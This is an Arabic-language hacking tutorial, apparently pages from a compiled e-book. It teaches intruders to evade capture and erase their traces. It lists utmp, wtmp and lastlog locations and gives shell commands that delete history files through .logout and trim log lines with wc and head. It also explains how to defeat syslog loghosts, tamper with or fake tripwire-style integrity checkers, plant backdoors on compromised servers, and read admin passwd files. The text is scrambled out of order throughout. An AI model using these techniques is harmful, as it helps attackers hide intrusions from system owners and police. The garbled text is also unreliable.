‪..TELNET‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تحمي نفسك وتخفي أفعالك؟!"‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫مقدمه بسيطه ‪:‬‬ ‫==========‬ ‫في البدايه و قبل كل شئ ارجو منكم تحمل اخطائي سواء كانت نحويه او املئيه ‪ ..‬كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ ‪ FTP‬أو ‪.‬ارجو ان تكون صبورا متانيا حتى اخر الموضوع‬ ‫‪76‬‬ .

‬لكن انشاله سيكون دفعه للمام و ليس‬ ‫لن تخاف و تتراجع‬ ‫اسلوب الموضوع غريب ‪ ..‬و عادة ما نتجنبه دائما ‪ ..‬لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد النتهاء من قراءة‬ ‫الموضوع ‪.‬؟‬ ‫و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟!‬ ‫يمكن يرى البعض ان هذا لم بحدث قط لي شخص نعرفه ؟ او ان بلدنا ليس فيها هذه التقنيات العاليه !! لكن‬ ‫هذا قد يحدث يوم ما !!‬ ‫و ايضا انت لتهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه ‪ ...‫هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك ‪ ..‬سيتم توضيح معناها و مفهومها مع شرح هذا الجزء‬ ‫انشاله ‪..‬بمعنى اخر ‪ .‬‬‫ تحقق من ‪syslog configuration and logfile‬‬‫ تحقق من نوعيات برامج المن المثبته‬‫ تحقق من وجود المدراء ‪Admins‬‬‫ كيف يمكن تصحيح ‪checksum checking software‬‬‫ حيل المستخدم المنيه‬‫الجزء الخامس ‪ :‬ماذا تفعل ان وضعت تحت المراقبه‬ ‫الجزء السادس ‪ :‬ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك‬ ‫‪77‬‬ .‬كما‬ ‫انه لبد من الحرص و فهم المور اذا كنت تريد ان تسمي نفسك هكر ‪ hacker‬بمعنى الكلمه‬ ‫ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير لنك من المعروفين عنهم بالحتراف او انك‬ ‫ترى ذلك في نفسك ‪ ..‬كل من اخواننا و اساتذتنا من كتبوا‬ ‫دروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق ‪log files‬‬ ‫‪ .‬‬ ‫الجزء الثالث ‪ :‬الساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ) و سيتم عرضها من‬ ‫خلل النقاط التاليه (‬ ‫ تمهيد‬‫ امن نفسك‬‫ حسابك الخاص‬‫ ملفات اللوق ‪LoGs‬‬‫ ل تترك اي اثر‬‫ امور و اشياء يجب تجنبها و الحظر منها‬‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب ملحظتها ) و سيتم عرضه من خلل النقاط التاليه (‬ ‫ تمهيد‬‫ امنع تقفى اثرك من اي نوع‬‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تلعب ‪.‬‬ ‫************************‬ ‫اذا كنت تظن ان الحصول على ترجمة الثغرات ) ‪ ( exploites‬باسرع ما يمكن هو ما يجعلك محترفا و‬ ‫متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط "‬ ‫ماذا ستفيدك الثغره الحديثه جدا ) ‪ ( 0day‬عندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره ‪ .....‬لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه‬ ‫************************‬ ‫الموضوع مقسم الى ‪ 8‬اجزاء ‪:‬‬ ‫=================‬ ‫الجزء الول ‪ :‬المقدمه ) و هو ماقد قمت انت بالنتهاء من قرائته حاليا (‬ ‫الجزء الثاني ‪ :‬المور العقليه و كيف تصبح **" ‪ " Paranoid‬هذا الجزء سيتم عرضه من خلل هذه‬ ‫المواضيع ‪:‬‬ ‫ الدافع او الحافز‬‫ لماذا ان لبد ان تصبح " ‪" Paraniod‬‬‫ كيف يمكن ان تصبح " ‪ " Paranoid‬؟‬‫ و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬‫** متاكد ان معظمكم يتسائل عن معنى هذه الكلمه ‪ .

..‬مثلها مثل بناء‬ ‫عضلت الجسم لن يكبر الجسم و يتقسم ال بعد ممارسة الرياضه الخاصه بذلك ) على سبيل المثال (‬ ‫مهما كنت متمرس او لديك الكثيير من المعلومات لبد اخذ اشد الحتياطات و الحذر قبل القيام باي شئ‬ ‫ لماذا يجب ان تصبح " ‪ " Paranoid‬؟‬‫***************************‬ ‫كلمة " ‪ " Paranoia‬في اللغه النجليزيه تعني جنون الرتياب ) نزعه عند الفراد تجعلك تشك في جميع‬ ‫المور و جميع الشخاص (‬ ‫اعتقدان المور بدات تتضح لنا بعد معرفة اصل هذه الكلمه ‪...‬ابوك ‪ .....‬نظرة الناس الغيير طبيعيه لك ) ليست نظرة اعجاب انما نظرة خوف‬ ‫( ‪ .‬امن نفسك‬ ‫اخذ جميع الحتياطات‬ ‫لتهتم بما قديقوله الكثيرون عنك بانك خواف او ما شابه‬ ‫اهتم باي ملف ‪ log‬مهما كانت قيمته تافهه‬ ‫لتصبح ‪ hacker‬عليك ان تقوم بعملك ‪ .....‫الجزء السابع ‪ :‬قائمه بافضل البرامج للتخفي و الختباء‬ ‫الجزء الثامن ‪ :‬كلمه ختاميه ‪ ...‬عليك الهتمام بما ما قد يصيب اهلك ‪ ..‬ما تراه انت‬ ‫بعينك المجرده انك تغير الصفحه الرئيسيه ‪ .‬سليما ‪% 100‬‬ ‫ كيف تصبح " ‪ " Paranoid‬؟‬‫*********************‬ ‫اذا كنت قرأت ما سبق و اقتنعت به انت بالفعل اصبحت هذا الشخص " ‪ " Paranoid‬لكن القتناع وحده ل‬ ‫يكفي و التحمس وحده وليد اللحظه ايضا ليكفي ‪ ..‬لبد ان تعرف لمن تقول هذه الحقيقه و كيف تتعامل مع الخرين ‪.‬فاحذر في كلمك على الهاتف لنه قد‬ ‫يكون مراقب ‪ ......‬لذا فان‬ ‫معظم من يسقطون ل يقومون ثاني ابدا !!‬ ‫لذا فاصبح حذرا جدا و شكاكا ‪ ...‬لن تحظى بفرص العمل التي تستحقها ‪ .....‬لكن في الحقيقه هي جريمه !!‬ ‫هل تعرف ماذا سينتظرك ان تم القبض عليك ؟!‬ ‫سيتم حرمانك من كل امور الكومبيوتر ‪ ..‬انما لبد ان يكون القلق و التوتر موجودين بشكل دائم‬ ‫في حياتك ) اللكترونيه (‬ ‫اذا كنت فعل تريد ان تكون هكر حقيقي ‪ ..‬زوجتك‬ ‫و اطفالك ) ان كنت متزوج (‬ ‫ربما لتشعر بان ماتقوم به هو جريمه ‪ ....‬‬ ‫يمكن ان نلخض ما ذكر من خلل الكلمات التاليه ‪ paraniod :‬تعني ان تصبح شديد الحذر و الشك في‬ ‫جميع الظروف‬ ‫لماذا يجب توخي الحذر بهذه الطريقه المخيفه ؟!!‬ ‫لن توقعك دائما الى اسوء الظروف يجعلك تسير في امان ‪ .‬ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من الن ‪!!! .‬امك ‪ .‬و لن ما تفعله هو شئ كبيير جدا ‪ ..‬‬ ‫مسئول و حريص‬ ‫المخترق ) ‪ ( Hacker‬الناجح لبد و ان تتوفر فيه هذه المبادىء و المكانيات العقليه ‪ ..‬او حتى بريديك الشخصي و اللكتروني ) لبد ان تعمل حساب الغير المتوقع (‬ ‫‪78‬‬ .‬العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي ‪.‬اخوتك ‪ .‬ستسدعى عند حصول اي مشاكل اخرى من هذا النوع ‪ .‬او تقوم بتحميل بعض المعلومات من السيرفر هو شئ بسيط بل‬ ‫و سهل جدا‬ ‫ماذا لو انك اخترقت سيرفر معين و تم رصدك و تتبعك و القبض عليك من قبل الشرطه !؟! و انك سترمى في‬ ‫السجن كالسارقين و المجرمين‬ ‫ان كنت ل تهتم بما قد يحصل لك ‪ ..‬‬ ‫************************‬ ‫الجز الثاني ‪:‬‬ ‫=======‬ ‫ الدافع و الحافز ‪:‬‬‫*************‬ ‫لبد من تحكيم العقل للنجاح في اي عمل ‪ ..‬‬ ‫اعمل حساب انك مراقب دائما و انه هناك كاميرا خفيه وراك دائما ‪ .

‬و هذه قائمه بافضل البرامج و التي‬ ‫تعتبر اختيار الهاكرز الول ‪:‬‬ ‫ لمستخدمين ‪ MsDos‬اليكم ‪ SFS v.4b‬‬‫ لمستخدمين نظام ‪ *Amiga‬اليكم ‪ * ) EnigmaII v1.‬حتى لو كنت مخترق‬ ‫متمرس لبد ان تستوعب الفكار القادمه‬ ‫ امن نفسك ‪:‬‬‫***********‬ ‫ ماذا لو قرأ ال ‪ SysAdmin‬رسائلك البريديه اللكترونيه ؟‬‫ ماذا لو كانت اتصالتك الهاتفيه مسجله و مراقبه من قبل الشرطه ؟‬‫ ماذا لو تم ضبط الكومبيوتر الشخصي و السيطره على كل معلوماتك ؟‬‫اذا كنت لتقوم بعمل اي اتصالت هاتفيه مع اي شخص من الهاكرز او الكراكرز ‪ ..‬‬ ‫كما انه لبد و انك تمتلك بعض الملفات اللزمه للختراق او بعض المعلومات الي تعبر مدينه لك في حالة‬ ‫حدوث رصد لجهازك ) كبسه (‬ ‫>‪--‬‬ ‫‪<-‬‬‫قم بتشفير كل ما تملكه من معلومات حساسه ‪sensitive data‬‬ ‫يمكنك ذلك باستخدام بعض البرامج الموجوده مجانا على النترنت ‪ ..‫اذا ما قد ذكرته ل يهمك و انك انسان غير مبالي ‪ ..‬دعني اسألك هذه السئله ؟‬ ‫هل تريد ان يراك الخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر‬ ‫قلوبهم عليك ؟!‬ ‫هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟‬ ‫تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه‬ ‫ و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬‫******************************************‬ ‫بما انك قد استوعبت ماذكر حتى الن و قررت ان تكون انسان حريص جدا ‪ ..‬لبد ان تبقى هكذا طوال الوقت‬ ‫و تذكر هذه الكلمات ‪ :‬لحظة كسل واحده في اتخاذ الحتياطات المنيه قد تغير حياتك باكملها ؟!!!!‬ ‫دائما تذكر الدافع‬ ‫ الجزء الثالث ‪:‬‬‫=========‬ ‫ تمهيد‬‫******‬ ‫يجب معرفة هذه المور القادمه و استيعابها جيدا قبل ممارسة اي عملية اختراق ‪ ...5‬احدى انظمة التشغيل غير شائعة الستخدام‬‫خصوصا في عالمنا العربي (‬ ‫ لمستخدمين انظمة ال ‪ Unix‬اليكم ‪CFS v1..‬لتبادل الخبار و الفكار ‪.17‬او ‪SecureDrive 1.‬ول تبعث اي ايميلت فيه‬ ‫معلومات مشبوهه و ل تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه ل يشكل اي خوف لنه‬ ‫ببساطه ايضا انت لست مخترق او ‪(= hacker‬‬ ‫لنه لبد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال ‪ .33‬‬‫لتشفير الملفات بشكل فردي ) ملف بملف ( اليكم هذه البرامج ) الكثر شهره و الحسن اداء ( ‪:‬‬ ‫ ‪Triple DES‬‬‫ ‪IDEA‬‬‫ ‪(Blowfish (32 rounds‬‬‫ ‪file2file‬‬‫لتشفير اليميلت ‪:‬‬ ‫‪79‬‬ .

.x‬‬‫يمكنك ايضا تشفير عملية اتصالك ب ‪ ) Unix System‬على اساس انه ممكن ان تكون مراقب (‬ ‫و ذلك باستخدام ‪:‬‬ ‫ ‪ SSH‬المن حتى الن‬‫ ‪DES Login‬‬‫اجعل كلماتك السريه صعبة التخمين ‪ .‬انما الهتمام بعكس السكيورتي هو المشكله ==< الهاكينج‬‫>‪----‬‬ ‫ملفات اللوق ‪: LoGS‬‬ ‫============‬ ‫‪80‬‬ .‬المخابرات ‪ ..‬لكن في نفس‬ ‫الوقت لبد ان تتذكرها دائما‬ ‫اخترها من كتاب تتمتلكه ‪ ....‬غير منطقيه ‪ .‬اجعلها اكبر عدد ممكن من الحرف ) يعني عادة عند عمل اي اشتراك يطلب منك‬ ‫كلمه سريه تتكون من ‪ 8...‬و ان كان لديك ‪ document files‬او ملفات مطبوعه و ل تريدها مرة اخرى‬ ‫لتقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك العتياديه او ان اردت الحتفاظ بها‬ ‫فعليك كتابتها من جديد باسلوب مرمز او مشفر ليعرفه ال انت !!‬ ‫هل تعرف انه من الممكن ان ‪:‬‬ ‫=================‬ ‫تكون مراقب من ‪ :‬الشرطه ‪ .‫ ‪PGP v2..4‬احرف ( فاختر ال ‪ 8‬حروف‬ ‫ل تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي ‪ .‬ل توجد في القواميس ‪ .‬و‬ ‫على راي المثل المصري " امشي عدل يحتار عدوك فيك " فكلما كنت احتياطيا و حركاتك تحسبها بشكل‬ ‫صحيح !!! ففرص اطاحتك قليله جدا‬ ‫حساباتك و اشتراكات الشخصيه ‪:‬‬ ‫===================‬ ‫هنا سأتكلم عن حساباتك الشخصيه سواء كانت في العمل\المدرسه\الجامعه\اي كان فعليك بالتالي ‪:‬‬ ‫ ابدا ل تقوم باي عمل غيير قانوني ‪ ...‬‬ ‫اذا انت بالفعل متعمق جدا في الهاكينج فلبد من تشفير كل شئ يتعلق بهذه المور !!‬ ‫احفظ دائما نسخه احتياطيه من معلوماتك على ‪ CD‬او ‪ HD‬و بالطبع تكون مشفره حتى اذا خسرت‬ ‫المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه‬ ‫لتحتفظ بملفات لتحتاجها ‪ .‬هاكرز اخرون و انهم يتسطيعون رصد كل حركات باستخدام وسائل‬ ‫حديثه ليمكن تخيلها‬ ‫مثل ‪:‬‬ ‫ اجهزه تصوير تستطيع تصويرك عند بعد مئات المتار‬‫ نقطة ليزر مصوبه نحو غرفتك للتصنت على مكالماتك‬‫ موجات عالية التردد للتنصت على لمسات و صوت يديك على ال ‪!! keyborad‬‬‫تختلف بالطبع هذه المكانيات من مكان لخر و من دوله الى اخرى ‪ ..‬او مشبوه بحسابتك الشخصيه التي فيها يكون اسمك الحقيقي و‬‫هويتك و تفصيلت كامله عنك‬ ‫ عمرك ما تحاول ان تتصل بموقع قد تم اختراقه بواسطة ال ‪telnet‬‬‫ يمكنك الشتراك بحسابك الخاص في قائمة البريد لي موقع امني ‪ security‬من دون خوف ‪..‬غير شائعه ‪ ..‬و يرى البعض انه فيما اقوله‬ ‫مبالغه !!! لكن انت ل تعرف ماذا يخبئ لك المستقبل !! فلماذا لتستعد من الن !!!‬ ‫كما انه هناك الكثيير من اخواننا العرب في دول الخارج الذي بالفعل تتوفر فيها اجهزة التنصت هذه ‪ .6.‬انما يمكنك بان تشفرها ) حتى برموز تفهمها انت‬ ‫فقط ( و اتصل بهم من هواتف الشارع او من العمل ‪..‬‬‫ لكن كل مو هو مختص بالهاكينج من ملفات لبد ان تشفر او انها يتم مسحها فورا‬‫ ابدا ل تحفظ اي برامج و ادوات الختراق على الهارديسك في حسابك الشخصي‬‫ بريدك الحقيقي لتعطيه ال لمن تثق فيه ثقه عمياء !!!!‬‫ اهتمامك بالسكيورتي ل يجعلك مشبوها ‪ .

1 .lastlog‬‬ ‫ل تترك اثرا ‪:‬‬ ‫=======‬ ‫كثيير من الهاكرز ينجحون في عملية حذف دخولهم من ملفات اللوق ‪ ..‫هناك ‪ 3‬ملفات مهمه جدا ‪:‬‬ ‫ ‪ WTMP‬للتسجيل عند الدخول و الخروج ) ‪( log on/off ..‬دون ان تقوم بتغيير‬ ‫اي شئ يلفت انتباه مدير النظام‬ ‫و لعمل ذلك تابع معي ‪:‬‬ ‫لتعتمد البرامج التي روجت على انها لتقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثل‬ ‫برنامج ‪ZAP (or ZAP2‬‬ ‫لنه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيلحظه مدير النظام‬ ‫اذا عليك بالقيام بذلك يدويا ‪..‬لكن اتعلمت ( و‬ ‫هو انك تمسح اللوقات ‪logfiles‬‬ ‫علطول ‪ .logout>>.letter.‬اما اذا‬ ‫اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يلحظك اي شخص ‪ .history>.bak‬‬ ‫لكن الحل موجود ايضا لمسح ال ‪: History files‬‬ ‫‪mv ..logout‬‬ ‫‪81‬‬ . *.1‬‬ ‫‪echo rm -rf .logout‬‬ ‫‪echo rm -rf .‬لكنهم ينسون امرا هاما و قاتل !!! و‬ ‫هي الملفات التي توجد هنا‬ ‫‪tmp and $HOME/‬‬ ‫و جود ال ‪ Shell History‬في ‪ $HOME‬مصدر قلق كبيير ‪:‬‬ ‫‪: History files‬‬ ‫‪sh : ..‬لبد حذف دخولك من‬ ‫هذه الملفات و ال سيتم معرفة التي ‪:‬‬ ‫ ماذا قمت بالختراق !!‬‫ من اي مكان انت قادم‬‫ كم من الوقت بقيت اونلين ‪.‬هذا مجدي في حالة انك لتهتم بان يعرف الدمين انه هناك مخترق ما قد دخل على النظام ‪ ..log in/logout + tty + host‬‬‫ ‪ UTMP‬للمتواجدين اونلين حاليا !‬‫ ‪ LASTLOG‬تسجيل من اين جاءت هذه ‪logins‬‬‫** سنتكلم عنهم باستفاضه و تعمق فيما بعد ) في جزء اخر من نفس الموضوع (‬ ‫كل عملية دخول بواسطة ال ‪ telnet . rlogin‬يتم تسجيلها في هذه الملفات ‪ .history‬‬ ‫‪ksh : .sh_history‬‬ ‫‪bash: .‬‬ ‫عادة لبد ان تكوت ‪ root‬لتغير و تعدل في ال ‪ ) log files‬باستثناء بعض التوزيعات القديمه جدا (‬ ‫اماكن تواجد ملفات اللوق ‪ ) default‬تختلف باختلف التوزيع (‬ ‫‪UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬ ‫‪WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬ ‫‪LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log‬‬ ‫و في بعض النسخ القديمه ‪$home/.bash_history‬‬ ‫‪zsh : .history‬‬ ‫‪: Backup Files‬‬ ‫‪~* .dead..sh_history‬‬ ‫‪csh : .logout save. ftp .9‬مننا ) حتى انا كنت اقع في نفس هذا الخطا زمان ‪ .logout‬‬ ‫‪echo mv save.logout>>..‬‬‫خطا يقع فيه الجميع بنسبة ‪ % 99.

......‬‬ ‫في حالة انك اخترقت سيرفر معين من الفضل ان تضع عليه ‪ backdoors‬مخصصه لنظام التشغيل ) مش‬ ‫‪ sub7‬هههههههههه ( و هي كثييره و موجوده مجانا على النترنت‬ ‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب ملحظتها‬ ‫===============================‬ ‫ تمهيد‬‫*******‬ ‫بعد ان ثبت اول ‪ sniffer‬و خططت لبدا الختراقات ‪ .‬‬ ‫حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اسامي‬ ‫مخيفه على الفاضي ‪..‬‬ ‫* من الطبيعي ) العادي ( ان يسهل على مدير الشكبه ) ‪ ( admin‬معرفة النظام الذي كان المخترق عليه‬ ‫عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ) هذا ان كان الهاكر غبي لتركها كما هي ( او من‬ ‫ال ‪ output‬من ال ‪sniffer‬‬ ‫او من اوامر ‪ netstat‬في حالة ان المخترق مازال موجودا ‪online‬‬ ‫من اجل هذا تختاج ال ‪!! GateWay Server‬‬ ‫* ‪ A gateway server in between‬هذا واحد من الكثيير من السيرفرات التي يوجد لك حساب‬ ‫عليها و التي تعتبر في منتهى السخافه في الستخدام و انت تحتاج لن تكون رووت عليها لتستطيع تغيير ال‬ ‫‪wtmp and lastlogs‬‬ ‫كما انه لبد ان من استخدام اكثر من ‪ gateway server‬و ان تبدل بينهم باستمرار حتى ل يتم الكشف‬ ‫عنك ‪.‬يعني حين ان تستخدم بعض الشتراكات او ال ‪ shells‬التي تسمح بالعمل الخلفي‬ ‫‪ background‬لبد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت النظار !!!‬ ‫حاول ان لتستخدم ‪ parametres‬على قدر المستطاع ‪ .‬‬ ‫==< ) تحتاج دائما ل ‪ root access‬لتغيير اللوق (‬ ‫باستخدامك ل ‪ Dialup server‬يجنبك الكثيير من المشاكل ‪ .‬‬ ‫المهم هو انه كيف سيرصدك و عندها كيف يمكن ان يتعامل معك !!!‬ ‫لذا ففي هذا الجزء سيتم توضيح كل الحتمالت و الساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكن‬ ‫ان تمنعها ‪.‫ امور و اشياء يجب تجنبها و الحظر منها‬‫======================‬ ‫لتقوم ابدا بكسر اي باسورد ال على ‪ encrypted partition‬كما عليك دائما انت تحذر من استخدام‬ ‫اشتراكاتك ) اشتراك الجامعه على سبيل المثال (‬ ‫لنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه ‪ admin‬و من ثم سيعرف مالذي تقوم به و الملفات‬ ‫التي تستخدمها الخ ‪.‬على سبيل المثال اذا اردت ان تتصل من الشيل‬ ‫على تيلنت لموقع معين او سيرفر معين لتقوم بعمل التي ‪telnet http://www...‬عليك ان تعرف كيف تستخدم هذه التقنيات متعبا ما‬ ‫يلي ‪:‬‬ ‫ امنع تقفى اثرك من اي نوع‬‫**********************‬ ‫قد يلحظ الدمين ) مدير الشبكه ( وجودك كمخترق ‪ hacker‬و انك اطحت باحد المواقع لكن هذا ليهم ‪...‬‬ ‫من الشيل الذي ستخترق منه ‪ .host.com/ 23 :‬‬ ‫انما ببساطه اتبع الخطوات البطيئه و هي‬ ‫‪telnet‬‬ ‫‪open‬‬ ‫‪/http://www.host..‬‬ ‫لتفكر في نفسك فقط ‪ .com‬‬ ‫و هكذا ‪....‬حيث انك في غنى عن التعديل في ملفات‬ ‫اللوق بشرط ان تدخل باشتراك مختلف في كل مره تدخل فيها على ال ‪(= hacked system‬‬ ‫ملحوظه ‪ :‬اذا كنت قادر على التصال بسرفيرات ‪ dialup‬كثييره فل حاجه لن تستخدم ‪hacking‬‬ ‫‪82‬‬ .‬قم بالتصال بال ‪ gateway server‬و من ثم تتصل بالسيرفر المراد‬ ‫اختراقه ‪.

‬فعليك ان تتحقق من‬ ‫خصائص ال ‪syslog‬‬ ‫فاذا كانت اللوقات ‪ logs‬لتخزن فقط على الجهاز انما على ‪ hosts‬اخرى ‪ ...1‬اعثر على جميع الملفات المفتوحه ‪ :‬و يمكنك ذلك باستخدام برنامج ‪ LSOF‬هو اختصار ‪List Open‬‬ ‫‪ Files‬و من ثم يمكن العثور عليهم و التعديل فيهم‬ ‫‪ .‫‪ server‬لنه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خللها‬ ‫بالنسبه للمتواجدين في الوليات المتحده المريكيه و اوروبا ) الدول المتقدمه ( حتى و ان قمت بما سبق )‬ ‫‪ ( dialup servers‬يمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها !‬ ‫نتيجه و اختصار للنقطه السابقه موضحه بالرسم في الصوره التاليه ‪:‬‬ ‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تلعب ‪.‬حيث انه لبد من ان‬ ‫تخترق ال ‪ loghost‬لتعدل ملفات اللوق‬ ‫يمكن تعديل اللوق ‪ logfiles‬بعدة طرق ابسطها باستخدام اي محرر كتابه ‪ text editor‬او قم بعد اسطر‬ ‫الملف باستخدام ‪ wc‬و من ثم حذف اخر ‪ 10‬اسطر من خلل ‪"head -LineNumbersMinus10" :‬‬ ‫بالعربي ) عدد السطور مطروحا ‪ 10‬منه‪( head -‬‬ ‫اذا كان برنامج ‪ accouting‬مثبت على السيرفر يمكنك ببساطه استخدام ‪acct-cleaner from‬‬ ‫‪ zhart‬و هو هيعمل اللزم‬ ‫اذا كان النظام يستخدم ‪ wtmpx‬و ‪ utmpx‬ايضا فمع السف عزيز انت في ورطه !!! فانا على اعرف اي‬ ‫برنامج للتعامل في هذه الحاله ‪ .....‬للحصول و العثور على هذه‬ ‫الملفات يمكن ذلك بهاتين الطريقتين ‪:‬‬ ‫‪ .2‬ابحث عن كل الملفات التي تغيرت ) حدث فيها تغيير ( من بعد دخولك ‪-‬‬ ‫بعد دخولك قم بعمل ‪ touch /tmp/check‬و بعدها قم "‪"find / -newer /tmp/check -print‬‬ ‫العمليه التي سنقوم بها ستاذخ الشكل التالي ‪ :‬بحث ‪ <-‬نتائج ‪ <-‬مطالعة النتائج ‪ <-‬تعديل‬ ‫قم ايضا بالتشيك على اماكن ال ‪ log files‬العتياديه ‪ /usr/adm‬و ‪ /var/adm‬و ‪/var/log‬‬ ‫اذا يتم تسجيل العمليات في ال ‪ loghost‬يعني ‪ xx@loghost‬فانت هنا في مازق ‪ .‬فيؤسفني انك لبد من اختراق‬ ‫هذه ‪hosts‬‬ ‫ملف ال ‪ syslog‬موجود في ‪/etc/syslog.‬لو استطعت ان تبرمج واحد ) للخوه المبرمجين ( ل تنسى ان تعلنا به =(‬ ‫ تحقق من ‪syslog configuration and logfile‬‬‫************************************‬ ‫تعتمد معظم البرامج على ال ‪ syslog function‬لتسجيل اي شئ يريدونه ‪ .conf‬‬ ‫‪83‬‬ .‬‬‫**************************************************‬ ‫***‬ ‫من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها ‪ ..

‬و يمكن تنفيذ ذلك بطريقتين‪:‬‬ ‫ قم بتعديل البرنامج برمجيا لكي ل يقوم بالبلغ عنك )واسعه شويه دي( أو قم بأزالته و أستعمل برنامجا‬‫مزيفا‬ ‫ قد تضطر إلى أزاله الـ ‪ back door‬الذي أستعملته و محاوله تحميله بطريقه أخرى‬‫ تحقق من وجود المدراء ‪Admins‬‬‫****************************‬ ‫من المهم أن تجد جميع المدراء على الموقع‪ .bash_history‬لمعرفه الوامر التي يستعملونها عادة‪ .tiger.‬و مدخلت الـ ‪alias‬‬‫أفحص ملف الـ ‪ sulog‬و حدد المستخدمين الذين نجحو في تنفيذ المر ‪ su root‬بنجاح‬‫ أسحب ملف الـ ‪ group‬و أبحث عن جميع المجموعات التي لها علقه بالداره ) ‪admin.‬هذه القيمة ُتحسب من‬ ‫خلل عملية كشف الجمع(‬ ‫بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات‪ ،‬وفي حالة حدوث اي‬ ‫تغير‪ ،‬يقوم بفحص الملفات ويستطيع اكتشافها‬ ‫فكيف تعرف مااذا استخدمت هناك برامج التحقق واي النواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدم‬ ‫من اجلك ؟‬ ‫هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذا‬ ‫استخدمت مثل تلك البرامج علي الملفات للحماية‬ ‫هذه اسماء بعض البرامج التي تقوم ب عملية فحص ‪checksum‬‬ ‫‪84‬‬ .‫ تحقق من نوعيات برامج المن المثبته‬‫******************************‬ ‫توجد العديد من برامج الفحص المني غالبا على المواقع ذات الحس المني العالي‪ .‬‬ ‫أستخدم أحدى الدوات التاليه ‪ chid.binaudit. spi.‬خاصه المخفيه منها قد تجد‬ ‫بعض الشياء المفيده حقا‬ ‫‪checksum checking software‬‬ ‫************************‬ ‫برامج ‪ ) checksum‬هو قيمة رقمية ُتستعمل للتأكد من خلو البيانات من الخطاء‪ .‬وتدار هذة البرامج‬ ‫بواسطه أداه تسمى ‪ cron‬و يكون مكانها الفتراضي أو الطبيعي هو ‪ /var/spool/cron/crontabs‬و‬ ‫هي تقوم بمتابعه جميع المدخلت ‪ .‬خاصه الـ ‪ Root‬و الملفات التي يستعملها‪ . root.‬و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات ‪ .‬و إذا ماكانت أدوات أمنيه‬ ‫خفيه مستخدمه‪ .c.‬و أفحص الملفات‬ ‫التاليه ‪ history/.login/. cops.‬يمكنك معرفه كل المدراء على الموقع‪ .‬‬ ‫‪ profile/. s3 etc‬‬ ‫ينبغي على المقتحم أن يتأكد من وجود هذه الدوات و التأكد من التقارير التي ترسلها ‪ .‬للتأكد من أنها ل‬ ‫تكشف عمليه القتحام‬ ‫يمكنك تعديل مفات هذه البرامج للتأكد من أنها لن تقوم بالبلغ عن القتحام‪ . tripwire.‬أو أكتشاف معلومات مخفيه‪ .‬‬ ‫من الدوات الت تستعمل في مثل هذه الفحوصات الداخليه‬ ‫‪. etc‬‬ ‫أسحب ملف ‪ passwd‬بالنسبه للمدير لعرض كلمات سر المدراء‬‫يعد كل هذا ‪ .sh_history/.‬‬ ‫توجد عده طرق لكشف هذه المعلومات‪:‬‬ ‫ قم بفحص الملف ‪ forword. l5‬‬ ‫‪.‬أدخل إلى مجلداتهم الخاصه ) في حاله عدم أستطاعتك ‪. hobgoblin. changeid.‬و يكون بعضها في مجلد الـ ‪ ~/bin‬الخاص‬ ‫به‪ .bash_profile‬لمراجعه أعدادات الـ ‪ alias‬التي تستخدم‪ .‬و تحاول معرفه الحسابات العاديه التي يتم أستخدامها‪.‬كما يمكن ان يكون هناك ‪ sinnefer‬موضوع لغراض امنيه في نفس المكان‪.c‬لنتحال شخصيه المستخدم( ‪ 